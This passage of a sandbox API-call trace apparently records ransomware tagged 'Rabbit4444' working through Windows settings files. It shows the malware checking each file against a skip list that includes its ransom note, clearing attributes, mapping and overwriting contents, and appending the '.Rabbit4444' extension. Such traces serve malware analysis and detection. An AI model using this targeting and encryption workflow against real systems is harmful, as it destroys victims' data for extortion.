0x70000 [0057.303] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x102040) returned 1 [0057.303] CryptGenRandom (in: hProv=0x102040, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0057.303] CryptReleaseContext (hProv=0x102040, dwFlags=0x0) returned 1 [0057.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.304] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.304] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.304] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.304] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14861438568) returned 1 [0057.304] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0057.304] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0057.304] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.304] CloseHandle (hObject=0x298) returned 1 [0057.304] CloseHandle (hObject=0x278) returned 1 [0057.304] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms.Rabbit4444") returned 199 [0057.304] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_mouse_setbuttonconfiguration.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_mouse_setbuttonconfiguration.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.305] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2898aa5c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2898aa5c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2391d733, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms", cAlternateFileName="AA706B~1.SET")) returned 1 [0057.305] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.305] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.305] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.305] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms", lpString2=".") returned 1 [0057.305] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms", lpString2="..") returned 1 [0057.305] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms", lpString2="windows") returned -1 [0057.305] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.305] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.305] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms", lpString2="boot") returned -1 [0057.305] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.305] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.305] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms") returned="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms" [0057.305] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.306] lstrlenW (lpString="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms") returned 62 [0057.306] lstrlenW (lpString="Rabbit4444") returned 10 [0057.306] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.306] lstrlenW (lpString=".dll") returned 4 [0057.306] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.306] lstrlenW (lpString=".lnk") returned 4 [0057.306] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.306] lstrlenW (lpString=".ini") returned 4 [0057.306] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.306] lstrlenW (lpString=".sys") returned 4 [0057.306] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.306] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_mouse_setscrollpage.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.306] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.306] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14861698102) returned 1 [0057.306] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1262) returned 1 [0057.306] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.306] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0057.306] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.307] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.309] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.309] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.309] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.309] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14861952820) returned 1 [0057.309] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.309] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0057.309] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.309] CloseHandle (hObject=0x298) returned 1 [0057.309] CloseHandle (hObject=0x278) returned 1 [0057.309] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms.Rabbit4444") returned 190 [0057.309] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_mouse_setscrollpage.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_mouse_setscrollpage.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.310] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28abbd21, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x28abbd21, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms", cAlternateFileName="AAE56F~1.SET")) returned 1 [0057.310] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.310] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.310] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.310] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms", lpString2=".") returned 1 [0057.310] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms", lpString2="..") returned 1 [0057.310] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms", lpString2="windows") returned -1 [0057.310] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.310] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.310] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms", lpString2="boot") returned -1 [0057.310] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.310] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.310] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms") returned="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms" [0057.310] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.311] lstrlenW (lpString="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms") returned 60 [0057.311] lstrlenW (lpString="Rabbit4444") returned 10 [0057.311] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.311] lstrlenW (lpString=".dll") returned 4 [0057.311] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.311] lstrlenW (lpString=".lnk") returned 4 [0057.311] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.311] lstrlenW (lpString=".ini") returned 4 [0057.311] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.311] lstrlenW (lpString=".sys") returned 4 [0057.311] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.311] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_cursorspeed.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.311] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.311] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14862195155) returned 1 [0057.311] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1255) returned 1 [0057.311] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0057.311] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0057.311] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.312] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.313] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.314] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14862440246) returned 1 [0057.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0057.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0057.314] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.314] CloseHandle (hObject=0x298) returned 1 [0057.314] CloseHandle (hObject=0x278) returned 1 [0057.314] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms.Rabbit4444") returned 188 [0057.314] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_cursorspeed.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_cursorspeed.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.315] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28b54686, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x28b54686, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x505, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms", cAlternateFileName="AA140C~1.SET")) returned 1 [0057.315] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.315] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.315] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.315] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms", lpString2=".") returned 1 [0057.315] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms", lpString2="..") returned 1 [0057.315] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms", lpString2="windows") returned -1 [0057.315] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.315] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.315] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms", lpString2="boot") returned -1 [0057.315] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.315] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.315] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms") returned="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms" [0057.315] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.316] lstrlenW (lpString="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms") returned 66 [0057.316] lstrlenW (lpString="Rabbit4444") returned 10 [0057.316] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.316] lstrlenW (lpString=".dll") returned 4 [0057.316] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.316] lstrlenW (lpString=".lnk") returned 4 [0057.316] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.316] lstrlenW (lpString=".ini") returned 4 [0057.316] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.316] lstrlenW (lpString=".sys") returned 4 [0057.316] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.316] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_enableedgegesture.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.316] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.316] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14862691844) returned 1 [0057.316] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1285) returned 1 [0057.316] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0057.316] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0057.316] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0057.317] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0057.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.319] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.319] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.319] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.319] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14862948951) returned 1 [0057.319] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0057.319] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0057.319] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.319] CloseHandle (hObject=0x298) returned 1 [0057.319] CloseHandle (hObject=0x278) returned 1 [0057.319] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms.Rabbit4444") returned 194 [0057.319] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_enableedgegesture.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_enableedgegesture.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.320] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28e29353, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x28e29353, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms", cAlternateFileName="AA1803~1.SET")) returned 1 [0057.320] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.320] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.320] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.320] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms", lpString2=".") returned 1 [0057.320] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms", lpString2="..") returned 1 [0057.320] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms", lpString2="windows") returned -1 